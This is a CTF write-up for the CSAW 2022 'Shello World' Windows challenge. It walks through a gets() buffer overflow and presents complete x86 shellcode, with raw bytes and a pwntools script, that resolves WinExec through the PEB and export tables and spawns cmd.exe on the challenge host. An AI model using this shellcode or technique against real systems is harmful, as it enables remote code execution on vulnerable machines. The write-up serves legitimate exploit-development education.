
CSAW 2022 - Shello World Writeup

September 14, 2022 · 12 min read

Shello World

Binary Exploitation (pwn) - 471pts

Description:

Write your first Windows shellcode!

nc win.chal.csaw.io 7778

Hints:

The flag is in C:\chal\flag.txt.

Table of Contents

  1. Working with Windows
  2. Discovery
  3. Plagiarism is Still Easier
  4. Finding kernel32.dll
  5. Finding WinExec using Tables
  6. Popping a Shell
  7. Getting the Flag
  8. TL;DR

Working with Windows

This challenge gave us a .exe file, a .dll file, a Docker container, and socat (Socket Cat) portable.

Wine on Linux is usually a hassle, and I never have good luck with it. Luckily, for development reasons, my laptop dual-boots Windows, so all we have to do is set up a pwning environment real quick.

Everything is done through PowerShell, since it feels marginally better than cmd.

I ended up using socat to run the program so that I have a process to "connect" to. It can be run like so:

PS> ./socat.exe TCP-LISTEN:7778,reuseaddr,fork exec:./ShelloWorld.exe,pty,ctty,echo=0

From there I installed my standard tools: Cutter, Python, and pwntools.

Finally, I needed a debugger for Windows programs. I used x64dbg (specifically x32dbg, since the binary is 32-bit). My process was to run my exploit, let it pause, then attach to the pid in x32dbg. Our skeleton pwntools script looks like:

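from pwn import *

r = remote("127.0.0.1", 7778)  # the local socat listener

pause()             # attach x32dbg to the ShelloWorld.exe pid, then press Enter
r.recvuntil(b'>')   # wait for the input prompt (pwntools tubes work on bytes)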

With that all set up, we can start looking at the binary.

Discovery

Running the binary gives us a little intro about Windows, notes that it's running Windows Server 2019 LTS, and expects shellcode from us. Also, popping a shell is async, so we have to make the process idle after doing so (more on this later).

If you don't know what shellcode is, go read my Two's Compliment writeup; I'm going to make some basic assumptions about our goals here.

In this case, we're trying to call WinExec with the parameter C:\Windows\System32\cmd.exe to get a shell.

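What is WinExec? It's a Windows API function exported by kernel32.dll that runs a program from a command line. For our purposes it fills the role execve plays in Linux shellcode, except that it starts a new process instead of replacing the current one.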

Let's look at the .exe file first:

There are a few challenge-hosting functions that aren't really relevant. Our main function calls RunChallenge, which prints out the intro text and then calls _Vuln:

void _Vuln(void)
{
    undefined4 uVar1;
    int32_t in_stack_fffffde8;
    char *s;
    char buf [500];
    
    // void Vuln();
    _printf((int32_t)"Okay, give me some input!\n\n> ", in_stack_fffffde8);
    uVar1 = (**(code **)0x40904c)(1);
    _fflush(uVar1);
    _gets(&s);
    _printf((int32_t)"Thanks for playing...\n", in_stack_fffffde8);
    uVar1 = (**(code **)0x40904c)(1);
    _fflush(uVar1);
    return;
}

Our friend, the gets function. To double-check that this would work, I found a checksec for Windows. All the important binary security features are off: we have an executable stack, no canary, no randomization that matters, and so on.

At this point, I can see that this will be a simple buffer overflow, with a bit of ROPing to our code.

Let's look at the given .dll:

We have SuspiciousGadget:

void _SuspiciousGadget(void)
{
    (*(code *)&stack0xfffffffc)();
    return;
}

and BeKindToYourCSAWInfraTeam:


void BeKindToYourCSAWInfraTeam(void)
{
    code **ppcVar1;
    code *pcVar2;
    
    (*_Sleep)(120000);
    (*_ExitProcess)(0);
    /*
        omitted, irrelevant code
    */
}

Since there is no randomization, we can jump to these functions directly.

Basically, the start of our pwntools script will look like:

payload = b"A" * 508        # Buffer
payload += p32(0x62101627)  # sleep function
payload += p32(0x62101621)  # shellcode gadget

So the idea is that we overflow the buffer and the other garbage on the stack, then place the addresses of the sleep function and our shellcode gadget. The gadget just jumps back to the stack, which is where our shellcode will go.
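To make the layout concrete, here is a minimal sketch of the same prefix built with only the standard library. The local p32 helper is a stand-in for the pwntools function of the same name (little-endian, unsigned, 32-bit); the padding length and both addresses are the ones from this writeup.

```python
import struct

def p32(value):
    """Pack an unsigned 32-bit integer little-endian, like pwntools' p32 by default."""
    return struct.pack("<I", value)

PADDING_LEN = 508        # filler up to the overwritten slots (from the writeup)
SLEEP_FUNC = 0x62101627  # sleep function in the DLL (from the writeup)
GADGET = 0x62101621      # SuspiciousGadget in the DLL (from the writeup)

def build_prefix():
    """Everything that goes in front of the shellcode."""
    return b"A" * PADDING_LEN + p32(SLEEP_FUNC) + p32(GADGET)

prefix = build_prefix()
print(len(prefix))        # 516
print(prefix[-8:].hex())  # 2716106221161062
```

Because x86 is little-endian, each address shows up byte-reversed in the payload, which is worth remembering when checking the stack in the debugger.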

Plagiarism is Still Easier

From my previous shellcode writing, it's usually easier to find someone else who did what you are trying to do and modify it. Googling "Windows shellcode" brings you to this writeup.

They go through explaining the call structure and the architecture of Windows system calls and APIs. It's a good read. They wrote shellcode and directly executed it in C. I'm going to go through and explain how I modified it to work in our challenge. If you want further explanation on how the kernel32.dll is found, and how we find the WinExec function, read that writeup!

Finding kernel32.dll

So apparently, with most security features off, you can find kernel32.dll without much hassle. Since we need to ROP, it's probably a good idea to follow calling conventions (saving registers, allocating stack space) to avoid crashing and to keep our next return address in the right place.

We first start with some standard stack allocation/calling convention:

push eax ; Save all registers
push ebx
push ecx
push edx
push esi
push edi
push ebp


push ebp ; Establish a new stack frame
mov ebp, esp

sub esp, 18h ; alloc mem on stack

We then push the string WinExec onto the stack:

xor esi, esi
push esi			; null termination
push 0x63
pushw 0x6578
push 0x456e6957
mov [ebp-4], esp    ; var4 = "WinExec\x00"
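To see why those four pushes spell out the string, here is a small sketch that replays them in Python. The simulate_pushes helper is hypothetical (it is not part of the exploit); it only models the fact that each push lands at a lower address than the previous one.

```python
import struct

def simulate_pushes(pushes):
    """Return the bytes found at esp after a sequence of (value, size) pushes."""
    stack = b""
    for value, size in pushes:
        fmt = "<I" if size == 4 else "<H"
        # A push moves esp down, so the newest value sits in front of the older ones.
        stack = struct.pack(fmt, value) + stack
    return stack

pushes = [
    (0x00000000, 4),  # push esi (esi = 0): null padding
    (0x00000063, 4),  # push 0x63: the imm8 is extended to a dword, "c\0\0\0"
    (0x6578, 2),      # pushw 0x6578: "xe"
    (0x456E6957, 4),  # push 0x456e6957: "WinE"
]

stack = simulate_pushes(pushes)
print(stack[:8])  # the 8 bytes that repe cmpsb later compares
```

The first 8 bytes at esp are "WinExec" plus its null terminator, which matches the 8-byte comparison done in the search loop.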

Then, we work on finding kernel32.dll's base address. I had originally tried to just hard-code it. That worked while I had the debugger attached, but it didn't work on remote, and it didn't reliably work locally either. I also had trouble with Docker, so I went through all the steps that the writeup did. The advantage is that this is more or less portable to shellcode challenges of a similar level.

; Find kernel32.dll base address
xor esi, esi			; esi = 0
mov ebx, [fs:0x30 + esi]  	; avoiding null bytes
mov ebx, [ebx + 0x0C] 
mov ebx, [ebx + 0x14] 
mov ebx, [ebx]	
mov ebx, [ebx]	
mov ebx, [ebx + 0x10]		; ebx has kernel32 base addr
mov [ebp-8], ebx 		; var8 = kernel32.dll base addr
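The pointer chase above can be mimicked on a toy memory map. This is only a sketch: every address in fake_memory is invented, and the module order (the .exe, then ntdll.dll, then kernel32.dll) is the usual load order this shellcode relies on rather than a guarantee. The offsets are the ones the shellcode uses: PEB+0x0C for the loader data, +0x14 for the in-memory-order module list, and +0x10 from a list entry for the module base.

```python
def find_third_module_base(mem, peb):
    """Follow the same dword reads as the shellcode; mem maps address -> dword."""
    ldr = mem[peb + 0x0C]      # mov ebx, [ebx + 0x0C]: loader data
    entry = mem[ldr + 0x14]    # mov ebx, [ebx + 0x14]: first list entry (the .exe)
    entry = mem[entry]         # mov ebx, [ebx]: second entry (ntdll.dll)
    entry = mem[entry]         # mov ebx, [ebx]: third entry (kernel32.dll)
    return mem[entry + 0x10]   # mov ebx, [ebx + 0x10]: module base address

# Invented addresses, for illustration only.
PEB, LDR = 0x1000, 0x2000
EXE_ENTRY, NTDLL_ENTRY, K32_ENTRY = 0x3008, 0x4008, 0x5008

fake_memory = {
    PEB + 0x0C: LDR,
    LDR + 0x14: EXE_ENTRY,
    EXE_ENTRY: NTDLL_ENTRY,          # forward link to the next module
    NTDLL_ENTRY: K32_ENTRY,
    K32_ENTRY: LDR + 0x14,           # the list is circular
    EXE_ENTRY + 0x10: 0x00400000,    # made-up base of the .exe
    NTDLL_ENTRY + 0x10: 0x77000000,  # made-up base of ntdll.dll
    K32_ENTRY + 0x10: 0x76000000,    # made-up base of kernel32.dll
}

kernel32_base = find_third_module_base(fake_memory, PEB)
print(hex(kernel32_base))
```

Nothing here depends on a hard-coded address, which is why this approach survived the move from the local machine to remote.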

This is all good... let's move on to finding the WinExec address by pulling up all of the address tables that we need to iterate through in kernel32.dll:

Finding WinExec using Tables

	; Find WinExec address
	mov eax, [ebx + 0x3C]		; RVA of PE signature
	add eax, ebx       		; Address of PE signature = base address + RVA of PE signature
	mov eax, [eax + 0x78]		; RVA of Export Table
	add eax, ebx 			; Address of Export Table

	mov ecx, [eax + 0x24]		; RVA of Ordinal Table
	add ecx, ebx 			; Address of Ordinal Table
	mov [ebp-0x0C], ecx 		; var12 = Address of Ordinal Table

	mov edi, [eax + 0x20] 		; RVA of Name Pointer Table
	add edi, ebx 			; Address of Name Pointer Table
	mov [ebp-0x10], edi 		; var16 = Address of Name Pointer Table

	mov edx, [eax + 0x1C] 		; RVA of Address Table
	add edx, ebx 			; Address of Address Table
	mov [ebp-0x14], edx 		; var20 = Address of Address Table

	mov edx, [eax + 0x14] 		; Number of exported functions

	xor eax, eax 			; counter = 0

This is where we run into our first problem...

That 0x1C byte from mov edx, [eax + 0x1C], for whatever reason, causes gets() to not work, and our shellcode doesn't get read. I cannot explain to you the sheer amount of confusion that I had when building this. One moment it was reading the code, the next it wasn't. I knew that line feeds and whatnot were off the table because it's gets(), but this random file separator byte decided to break everything. (A plausible culprit is the pty in front of the program rather than gets() itself: 0x1C is the default terminal QUIT character, Ctrl-\.)

So I fiddled with it to avoid using that byte:

mov esi, eax
add esi, 0x20
dec esi
dec esi
dec esi
dec esi
mov edx, [esi] ; RVA of Address Table
xor esi, esi

We then loop through the name pointer table until we find WinExec:

loop: 
    mov edi, [ebp-0x10] ; addr. of Name Ptr Table
    mov esi, [ebp-4] ; WinExec
    xor ecx, ecx

    cld  ; set DF=0 => process strings from left to right
    mov edi, [edi + eax*4]
    add edi, ebx
    add cx, 8
    repe cmpsb  ; esi and edi registers. ZF=1 if equal, ZF=0 if not
    jz found
    inc eax
    cmp eax, edx  ;check if last function reached
    jb loop
    add esp, 0x26  ; reclaim stack

Once we've found WinExec, we do a bit of math to get the exact pointer:

found:
    mov ecx, [ebp-0x0C]	; ecx = var12 = Address of Ordinal Table
    mov edx, [ebp-0x14]  	; edx = var20 = Address of Address Table

    mov ax, [ecx + eax*2] 	; ax = ordinal number = var12 + (counter * 2)
    mov eax, [edx + eax*4] 	; eax = RVA of function = var20 + (ordinal * 4)
    add eax, ebx 		; eax = address of WinExec = kernel32.dll base address + RVA of WinExec

    xor edx, edx

And yet another problem! The 0x04 bytes in the compiled mov ax, [ecx + eax*2] and mov eax, [edx + eax*4] don't get read by gets(). Unlike with 0x1C, the buffer still fills, but the 0x04 bytes are simply absent, which breaks the shellcode. Again, a lot of confusion: I would SEE the code get read in, but every instruction after the missing byte was shifted and decoded into a garbled mess. (0x04 is the default terminal EOF character, Ctrl-D, so this looks like the pty layer in front of the program swallowing a control character rather than gets() misbehaving.)

So again, more fiddling to keep those 0x04 bytes from showing up:

mov esi, ecx
add esi, eax
add esi, eax
mov ax, [esi] ; ax = ordinal number = var12 + (counter * 2)
mov esi, edx
add esi, eax
add esi, eax
add esi, eax
add esi, eax
mov eax, [esi] ; eax = RVA of function = var20 + (ordinal * 4)
xor esi, esi
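The whole lookup (name pointer table, then ordinal table, then address table) can be sketched in Python against a tiny synthetic image. Everything in build_fake_image is made up for illustration: the RVAs, the second export name, and the function addresses. The structure offsets are the same ones the assembly uses. One deliberate difference: this sketch bounds the search with the number of names at offset 0x18, whereas the shellcode uses the number of functions at offset 0x14.

```python
import struct

def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]

def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]

def cstr(img, off):
    """Read a null-terminated byte string starting at off."""
    return bytes(img[off:img.index(b"\x00", off)])

def resolve_export(img, base, name):
    """img is indexed by RVA, as if the module were mapped at base."""
    pe = u32(img, 0x3C)                 # RVA of PE signature
    exp = u32(img, pe + 0x78)           # RVA of export table
    count = u32(img, exp + 0x18)        # number of exported names
    addr_table = u32(img, exp + 0x1C)   # RVA of address table
    name_table = u32(img, exp + 0x20)   # RVA of name pointer table
    ord_table = u32(img, exp + 0x24)    # RVA of ordinal table
    for i in range(count):
        if cstr(img, u32(img, name_table + 4 * i)) == name:
            ordinal = u16(img, ord_table + 2 * i)
            return base + u32(img, addr_table + 4 * ordinal)
    return None

def build_fake_image():
    """A toy image with two exports; all values here are invented."""
    img = bytearray(0x400)
    struct.pack_into("<I", img, 0x3C, 0x80)           # PE signature at RVA 0x80
    struct.pack_into("<I", img, 0x80 + 0x78, 0x100)   # export table at RVA 0x100
    struct.pack_into("<II", img, 0x100 + 0x14, 2, 2)  # 2 functions, 2 names
    struct.pack_into("<III", img, 0x100 + 0x1C, 0x180, 0x140, 0x160)
    img[0x200:0x205] = b"Beep\x00"
    img[0x210:0x218] = b"WinExec\x00"
    struct.pack_into("<II", img, 0x140, 0x200, 0x210)    # name pointer table
    struct.pack_into("<HH", img, 0x160, 1, 0)            # ordinal table
    struct.pack_into("<II", img, 0x180, 0x5000, 0x6000)  # address table
    return img

image = build_fake_image()
print(hex(resolve_export(image, 0x76000000, b"WinExec")))
```

The ordinal table in the toy image is intentionally not in the same order as the names, to show why the index found in the name pointer table cannot be used on the address table directly.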

Popping a Shell

First, we load our parameter onto the stack:

xor edx, edx
push edx         ; null terminator
push 0x20657865
push 0x2e646d63
push 0x5c32336d
push 0x65747379
push 0x535c7377
push 0x6f646e69
push 0x575c3a43 ; "C:\Windows\System32\cmd.exe "

The writeup's shellcode used calc.exe at first, and interestingly that whole path is a multiple of 4 bytes long, which makes for a bunch of clean 4-byte stack pushes. Our cmd.exe path is one byte short. Luckily, Windows doesn't give a shit, and I can just use a space (0x20) to fill... space.

(Also, remember little endian and stack structure, which is why the bytes are ordered backwards!)
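Working out those constants by hand is error-prone, so here is a small sketch that derives them. The string_to_pushes helper is hypothetical and not part of the original exploit; it pads the string with spaces to a multiple of 4 bytes, then emits the dwords in the order they have to be pushed (last chunk first).

```python
import struct

def string_to_pushes(text, pad=b" "):
    """Return the 32-bit immediates to push, in push order, for an ASCII string."""
    data = text.encode("ascii")
    data += pad * (-len(data) % 4)  # pad up to a multiple of 4 bytes
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows downward, so the end of the string is pushed first.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]

pushes = string_to_pushes("C:\\Windows\\System32\\cmd.exe")
for imm in pushes:
    print(f"push 0x{imm:08x}")
```

The null terminator is still pushed separately (push edx with edx zeroed), since an immediate containing zero bytes would put nulls into the shellcode.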

Finally, we call WinExec with our parameters pushed onto the stack:

mov esi, esp		; esi -> "C:\Windows\System32\cmd.exe "

push 10  		; window state SW_SHOWDEFAULT
push esi 		; "C:\Windows\System32\cmd.exe "
call eax 		; WinExec

add esp, 0x46		; clear the stack
ret

One last issue: we can't use 0x0a, because it causes gets() to stop reading. Luckily, this parameter only controls how the window is shown. The original author wanted the default behavior, so he used 10 (SW_SHOWDEFAULT). I can just change this to 1:

push 0x01

So WinExec gets called with our path and the SW_SHOWNORMAL window mode. Not that it matters, since we're just popping a shell.
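With three problem bytes found the hard way, a quick scan of the assembled bytes before sending would have saved some of that confusion. The sketch below is a hypothetical helper, not part of the original exploit. Its bad-byte list contains only the values that caused trouble in this challenge, and the sample encodings are the instructions discussed above.

```python
# Bytes that broke input in this challenge, with the symptom seen for each.
BAD_BYTES = {
    0x0A: "line feed, gets() stops reading",
    0x1C: "input was not read at all",
    0x04: "byte silently dropped",
}

def find_bad_bytes(shellcode, bad=BAD_BYTES):
    """Return (offset, byte) pairs for every problematic byte in shellcode."""
    return [(off, b) for off, b in enumerate(shellcode) if b in bad]

samples = {
    "mov edx, [eax + 0x1C]": bytes.fromhex("8b501c"),
    "mov ax, [ecx + eax*2]": bytes.fromhex("668b0441"),
    "mov eax, [edx + eax*4]": bytes.fromhex("8b0482"),
    "push 10": bytes.fromhex("6a0a"),
    "push 0x01": bytes.fromhex("6a01"),
}

for asm, code in samples.items():
    hits = find_bad_bytes(code)
    print(f"{asm:24} {code.hex():10} {hits}")
```

Running the same function over the full shellcode right before r.sendline would flag any instruction that needs to be rewritten.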

Getting the Flag

Because we reclaimed our stack, ret returns to the address of the DLL's sleep function that we placed in the payload, which puts the chal process to sleep. Since the shell is async, we need the chal process to sleep; otherwise it exits and takes our connection with it.
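A quick tally of the stack adjustments shows where that final ret ends up. This is a sketch under one assumption: WinExec uses the normal Windows API calling convention and removes its own two arguments when it returns. The byte counts are read straight off the shellcode.

```python
# Net effect of the shellcode on esp, in bytes (positive = stack grows).
events = [
    ("push eax..ebp (7 registers)", 7 * 4),
    ("push ebp (new frame)", 4),
    ("sub esp, 0x18", 0x18),
    ("WinExec string pushes", 4 + 4 + 2 + 4),
    ("null terminator + 7 path pushes", 8 * 4),
    ("push 0x01 / push esi", 2 * 4),
    ("WinExec pops its 2 arguments (assumed)", -2 * 4),
    ("add esp, 0x46", -0x46),
]

left_on_stack = sum(delta for _, delta in events)
print(hex(left_on_stack), left_on_stack // 4)
```

If the assumption holds, 0x20 bytes are left, which are exactly the eight dwords pushed at the very start. The ret therefore pops the most recent of them, the second push ebp, so it jumps to whatever ebp held when the shellcode began. That would be consistent with the sleep function address at offset 508 of the payload landing in the saved ebp slot that _Vuln restores before returning, though I have not verified that layout against the binary.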

Our final exploit assembly:

push eax
push ebx
push ecx
push edx
push esi
push edi
push ebp

push ebp
mov ebp, esp
sub esp, 0x18

xor esi, esi
push esi
push 0x63
pushw 0x6578
push 0x456e6957
mov [ebp-4], esp

xor esi, esi
mov ebx, [fs:0x30 + esi]
mov ebx, [ebx + 0x0C] 
mov ebx, [ebx + 0x14] 
mov ebx, [ebx]	
mov ebx, [ebx]	
mov ebx, [ebx + 0x10]
mov [ebp-8], ebx


mov eax, [ebx + 0x3C]
add eax, ebx
mov eax, [eax + 0x78]
add eax, ebx

mov ecx, [eax + 0x24]
add ecx, ebx 
mov [ebp-0x0C], ecx

mov edi, [eax + 0x20]
add edi, ebx
mov [ebp-0x10], edi


mov esi, eax
add esi, 0x20
dec esi
dec esi
dec esi
dec esi
mov edx, [esi]
xor esi, esi
add edx, ebx
mov [ebp-0x14], edx
add eax, 0x14
dec eax
dec eax
mov edx, [eax]

xor eax, eax

loop:
    mov edi, [ebp-0x10]
    mov esi, [ebp-4]
    xor ecx, ecx

    cld 
    mov edi, [edi + eax*4]
    add edi, ebx
    add cx, 8
    repe cmpsb  
    jz found
    inc eax
    cmp eax, edx
    jb loop
    add esp, 0x26  		
found:
    mov ecx, [ebp-0x0C]
    mov edx, [ebp-0x14]
    mov esi, ecx
    add esi, eax
    add esi, eax
    mov ax, [esi]
    mov esi, edx
    add esi, eax
    add esi, eax
    add esi, eax
    add esi, eax
    mov eax, [esi]
    xor esi, esi
    add eax, ebx

xor edx, edx
push edx
push 0x20657865
push 0x2e646d63
push 0x5c32336d
push 0x65747379
push 0x535c7377
push 0x6f646e69
push 0x575c3a43
mov esi, esp
push 0x01
push esi
call eax
add esp, 0x46
ret

Our exploit script:

from pwn import *
# r = remote("127.0.0.1", 7778)
r = remote('win.chal.csaw.io', 7778)

# pause()

payload = b"A" * 508        # Buffer
payload += p32(0x62101627)  # sleep function
payload += p32(0x62101621)  # shellcode gadget
# lol
monolith = b'\x50\x53\x51\x52\x56\x57\x55\x55\x89\xE5\x83\xEC\x18\x31\xF6\x56\x6A\x63\x66\x68\x78\x65\x68\x57\x69\x6E\x45\x89\x65\xFC\x31\xF6\x64\x8B\x5E\x30\x8B\x5B\x0C\x8B\x5B\x14\x8B\x1B\x8B\x1B\x8B\x5B\x10\x89\x5D\xF8\x8B\x43\x3C\x01\xD8\x8B\x40\x78\x01\xD8\x8B\x48\x24\x01\xD9\x89\x4D\xF4\x8B\x78\x20\x01\xDF\x89\x7D\xF0\x89\xC6\x83\xC6\x20\x4E\x4E\x4E\x4E\x8B\x16\x31\xF6\x01\xDA\x89\x55\xEC\x83\xC0\x14\x48\x48\x8B\x10\x31\xC0\x8B\x7D\xF0\x8B\x75\xFC\x31\xC9\xFC\x8B\x3C\x87\x01\xDF\x66\x83\xC1\x08\xF3\xA6\x74\x08\x40\x39\xD0\x72\xE5\x83\xC4\x26\x8B\x4D\xF4\x8B\x55\xEC\x89\xCE\x01\xC6\x01\xC6\x66\x8B\x06\x89\xD6\x01\xC6\x01\xC6\x01\xC6\x01\xC6\x8B\x06\x31\xF6\x01\xD8\x31\xD2\x52\x68\x65\x78\x65\x20\x68\x63\x6D\x64\x2E\x68\x6D\x33\x32\x5C\x68\x79\x73\x74\x65\x68\x77\x73\x5C\x53\x68\x69\x6E\x64\x6F\x68\x43\x3A\x5C\x57\x89\xE6\x6A\x01\x56\xFF\xD0\x83\xC4\x46\xC3'
payload += monolith


r.recvuntil(b'>')
r.sendline(payload)
r.interactive()

Running it on remote gives us a shell, and we can read the flag!

[*] Switching to interactive mode
 Thanks for playing...
Microsoft Windows [Version 10.0.17763.3287]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>cd chal
cd chal

C:\chal>
C:\chal>more flag.txt
more flag.txt
flag{I_w4nt3d_t0_j01n_y0ur_T34ms_p4rty_but_1_h4d_t0_jump_t0_4n0th3r_funct10n}

C:\chal>
C:\chal>

Neat! A lot of the same principles as regular shellcode, but it takes extra work to get at the Windows API functions we need, since we have to find them in memory ourselves.

It was the 8th solve at the time. After 6 or 7 hours of work, I submitted the flag at 6am CST and promptly went to bed.

TL;DR

Use some Windows shellcode from online and adapt it to being read in by gets() rather than compiled into a C file. Place it in an exploit script and run it.

Assembly, x86, Binary Exploitation, Shellcode, Windows